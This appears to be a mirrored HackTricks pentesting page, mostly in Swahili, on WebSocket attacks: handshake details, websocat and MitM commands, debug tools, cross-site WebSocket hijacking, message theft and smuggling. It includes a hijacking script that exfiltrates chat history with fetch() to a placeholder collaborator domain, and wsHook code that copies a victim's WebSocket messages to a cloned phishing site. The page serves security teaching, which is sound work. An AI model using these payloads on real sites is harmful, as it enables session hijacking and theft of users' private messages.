maride/hacktricks
1
0
Fork 0
mirror of https://github.com/HackTricks-wiki/hacktricks.git synced 2025-10-10 18:36:50 +00:00
Code Issues Packages Projects Releases Wiki Activity
hacktricks/src/pentesting-web/websocket-attacks.md

158 lines
9.5 KiB
Markdown
Raw Blame History

# WebSocket Attacks
{{#include ../banners/hacktricks-training.md}}
## What are WebSockets
WebSocket connections zinaundwa kupitia mkutano wa awali wa **HTTP** na zimeundwa kuwa **za muda mrefu**, zikiruhusu ujumbe wa pande mbili wakati wowote bila haja ya mfumo wa kibiashara. Hii inafanya WebSockets kuwa na faida hasa kwa programu zinazohitaji **latency ya chini au mawasiliano yanayoanzishwa na seva**, kama vile mitiririko ya data za kifedha za moja kwa moja.
### Establishment of WebSocket Connections
Maelezo ya kina juu ya kuanzisha WebSocket connections yanaweza kupatikana [**hapa**](https://infosecwriteups.com/cross-site-websocket-hijacking-cswsh-ce2a6b0747fc). Kwa muhtasari, WebSocket connections kwa kawaida huanzishwa kupitia JavaScript upande wa mteja kama inavyoonyeshwa hapa chini:
```javascript
var ws = new WebSocket("wss://normal-website.com/ws")
```
Protokali `wss` inaashiria muunganisho wa WebSocket ulio salama na **TLS**, wakati `ws` inaonyesha muunganisho **usio salama**.
Wakati wa kuanzisha muunganisho, mkono wa handshake unafanywa kati ya kivinjari na seva kupitia HTTP. Mchakato wa handshake unahusisha kivinjari kutuma ombi na seva kujibu, kama inavyoonyeshwa katika mifano ifuatayo:
Kivinjari kinatuma ombi la handshake:
```javascript
GET /chat HTTP/1.1
Host: normal-website.com
Sec-WebSocket-Version: 13
Sec-WebSocket-Key: wDqumtseNBJdhkihL6PW7w==
Connection: keep-alive, Upgrade
Cookie: session=KOsEJNuflw4Rd9BDNrVmvwBF9rEijeE2
Upgrade: websocket
```
Majibu ya mkono wa server:
```javascript
HTTP/1.1 101 Switching Protocols
Connection: Upgrade
Upgrade: websocket
Sec-WebSocket-Accept: 0FFP+2nmNIf/h+4BP36k9uzrYGk=
```
The connection remains open for message exchange in both directions once established.
**Key Points of the WebSocket Handshake:**
- The `Connection` and `Upgrade` headers signal the initiation of a WebSocket handshake.
- The `Sec-WebSocket-Version` header indicates the desired WebSocket protocol version, usually `13`.
- A Base64-encoded random value is sent in the `Sec-WebSocket-Key` header, ensuring each handshake is unique, which helps to prevent issues with caching proxies. This value is not for authentication but to confirm that the response is not generated by a misconfigured server or cache.
- The `Sec-WebSocket-Accept` header in the server's response is a hash of the `Sec-WebSocket-Key`, verifying the server's intention to open a WebSocket connection.
These features ensure the handshake process is secure and reliable, paving the way for efficient real-time communication.
### Linux console
You can use `websocat` to establish a raw connection with a websocket.
```bash
websocat --insecure wss://10.10.10.10:8000 -v
```
Au kuunda seva ya websocat:
```bash
websocat -s 0.0.0.0:8000 #Listen in port 8000
```
### MitM websocket connections
Ikiwa unapata kwamba wateja wameunganishwa na **HTTP websocket** kutoka kwenye mtandao wako wa ndani, unaweza kujaribu [ARP Spoofing Attack](../generic-methodologies-and-resources/pentesting-network/index.html#arp-spoofing) ili kufanya shambulio la MitM kati ya mteja na seva.\
Mara tu mteja anapojaribu kuungana, unaweza kutumia:
```bash
websocat -E --insecure --text ws-listen:0.0.0.0:8000 wss://10.10.10.10:8000 -v
```
### Websockets enumeration
Unaweza kutumia **tool** [**https://github.com/PalindromeLabs/STEWS**](https://github.com/PalindromeLabs/STEWS) **kugundua, fingerprint na kutafuta** **vulnerabilities** zinazojulikana katika websockets kiotomatiki.
### Websocket Debug tools
- **Burp Suite** inasaidia mawasiliano ya MitM websockets kwa njia inayofanana sana na inavyofanya kwa mawasiliano ya kawaida ya HTTP.
- [**socketsleuth**](https://github.com/snyk/socketsleuth) **Burp Suite extension** itakuruhusu kudhibiti mawasiliano ya Websocket kwa njia bora zaidi katika Burp kwa kupata **history**, kuweka **interception rules**, kutumia **match and replace** rules, kutumia **Intruder** na **AutoRepeater.**
- [**WSSiP**](https://github.com/nccgroup/wssip)**:** Fupi kwa "**WebSocket/Socket.io Proxy**", chombo hiki, kilichoandikwa kwa Node.js, kinatoa interface ya mtumiaji ili **kuchukua, kukamata, kutuma ujumbe wa kawaida** na kuona mawasiliano yote ya WebSocket na Socket.IO kati ya mteja na seva.
- [**wsrepl**](https://github.com/doyensec/wsrepl) ni **interactive websocket REPL** iliyoundwa mahsusi kwa ajili ya pentesting. Inatoa interface ya kuangalia **ujumbe wa websocket unaoingia na kutuma mpya**, kwa mfumo rahisi wa **kujiendesha** mawasiliano haya.
- [**https://websocketking.com/**](https://websocketking.com/) ni **web ya kuwasiliana** na tovuti nyingine kwa kutumia **websockets**.
- [**https://hoppscotch.io/realtime/websocket**](https://hoppscotch.io/realtime/websocket) kati ya aina nyingine za mawasiliano/protocols, inatoa **web ya kuwasiliana** na tovuti nyingine kwa kutumia **websockets.**
## Websocket Lab
Katika [**Burp-Suite-Extender-Montoya-Course**](https://github.com/federicodotta/Burp-Suite-Extender-Montoya-Course) una msimbo wa kuzindua tovuti kwa kutumia websockets na katika [**this post**](https://security.humanativaspa.it/extending-burp-suite-for-fun-and-profit-the-montoya-way-part-3/) unaweza kupata maelezo.
## Cross-site WebSocket hijacking (CSWSH)
**Cross-site WebSocket hijacking**, pia inajulikana kama **cross-origin WebSocket hijacking**, inatambulika kama kesi maalum ya **[Cross-Site Request Forgery (CSRF)](csrf-cross-site-request-forgery.md)** inayohusisha WebSocket handshakes. Vulnerability hii inatokea wakati WebSocket handshakes zinathibitishwa pekee kupitia **HTTP cookies** bila **CSRF tokens** au hatua nyingine za usalama.
Wavamizi wanaweza kutumia hii kwa kuandaa **ukurasa wa wavuti mbaya** unaoanzisha muunganisho wa cross-site WebSocket kwa programu iliyo hatarini. Kwa hivyo, muunganisho huu unachukuliwa kama sehemu ya kikao cha mwathirika na programu, ikitumia ukosefu wa ulinzi wa CSRF katika mfumo wa usimamizi wa kikao.
### Simple Attack
Kumbuka kwamba wakati wa **kuanzisha** muunganisho wa **websocket** **cookie** inatumwa kwa seva. **Seva** inaweza kuwa inaitumia **kuhusisha** kila **mtumiaji maalum** na **websocket** **session yake kulingana na cookie iliyotumwa**.
Kisha, ikiwa kwa **mfano** **seva ya websocket** **inatuma nyuma historia ya mazungumzo** ya mtumiaji ikiwa ujumbe na "**READY"** umetumwa, basi **XSS rahisi** inayounda muunganisho (**cookie** itatumwa **kiotomatiki** kuidhinisha mtumiaji mwathirika) **ikiwasilisha** "**READY**" itakuwa na uwezo wa **kurejesha** historia ya **mazungumzo**.
```html
<script>
websocket = new WebSocket('wss://your-websocket-URL')
websocket.onopen = start
websocket.onmessage = handleReply
function start(event) {
websocket.send("READY"); //Send the message to retreive confidential information
}
function handleReply(event) {
//Exfiltrate the confidential information to attackers server
fetch('https://your-collaborator-domain/?'+event.data, {mode: 'no-cors'})
}
</script>
```
### Cross Origin + Cookie with a different subdomain
Katika chapisho hili la blogu [https://snyk.io/blog/gitpod-remote-code-execution-vulnerability-websockets/](https://snyk.io/blog/gitpod-remote-code-execution-vulnerability-websockets/) mshambuliaji alifanikiwa **kutekeleza Javascript isiyo na mipaka katika subdomain** ya kikoa ambapo mawasiliano ya web socket yalikuwa yanafanyika. Kwa sababu ilikuwa **subdomain**, **cookie** ilikuwa inatumwa, na kwa sababu **Websocket haikukagua Origin ipasavyo**, ilikuwa inawezekana kuwasiliana nayo na **kuiba tokens kutoka kwake**.
### Stealing data from user
Nakili programu ya wavuti unayotaka kujifanya (faili za .html kwa mfano) na ndani ya script ambapo mawasiliano ya websocket yanafanyika ongeza hii code:
```javascript
//This is the script tag to load the websocket hooker
;<script src="wsHook.js"></script>
//These are the functions that are gonig to be executed before a message
//is sent by the client or received from the server
//These code must be between some <script> tags or inside a .js file
wsHook.before = function (data, url) {
var xhttp = new XMLHttpRequest()
xhttp.open("GET", "client_msg?m=" + data, true)
xhttp.send()
}
wsHook.after = function (messageEvent, url, wsObject) {
var xhttp = new XMLHttpRequest()
xhttp.open("GET", "server_msg?m=" + messageEvent.data, true)
xhttp.send()
return messageEvent
}
```
Sasa pakua faili `wsHook.js` kutoka [https://github.com/skepticfx/wshook](https://github.com/skepticfx/wshook) na **uhifadhi ndani ya folda yenye faili za wavuti**.\
Kufichua programu ya wavuti na kumfanya mtumiaji aungane nayo utaweza kuiba ujumbe uliotumwa na kupokelewa kupitia websocket:
```javascript
sudo python3 -m http.server 80
```
## Mashindano ya Mbio
Mashindano ya Mbio katika WebSockets pia ni jambo, [angalia habari hii kujifunza zaidi](race-condition.md#rc-in-websockets).
## Uthibitisho Mwingine
Kama Web Sockets ni mekanismu ya **kutuma data kwa upande wa seva na upande wa mteja**, kulingana na jinsi seva na mteja wanavyoshughulikia habari, **Web Sockets zinaweza kutumika kutekeleza udhaifu mwingine kama XSS, SQLi au udhaifu mwingine wa kawaida wa wavuti kwa kutumia ingizo la mtumiaji kutoka kwa websocket.**
## **WebSocket Smuggling**
Udhaifu huu unaweza kukuruhusu **kupita vizuizi vya proxies za nyuma** kwa kuwafanya waamini kwamba **mawasiliano ya websocket yameanzishwa** (hata kama si kweli). Hii inaweza kumruhusu mshambuliaji **kupata maeneo yaliyofichwa**. Kwa maelezo zaidi angalia ukurasa ufuatao:
{{#ref}}
h2c-smuggling.md
{{#endref}}
## Marejeleo
- [https://portswigger.net/web-security/websockets#intercepting-and-modifying-websocket-messages](https://portswigger.net/web-security/websockets#intercepting-and-modifying-websocket-messages)
{{#include ../banners/hacktricks-training.md}}
Reference in New Issue View Git Blame Copy Permalink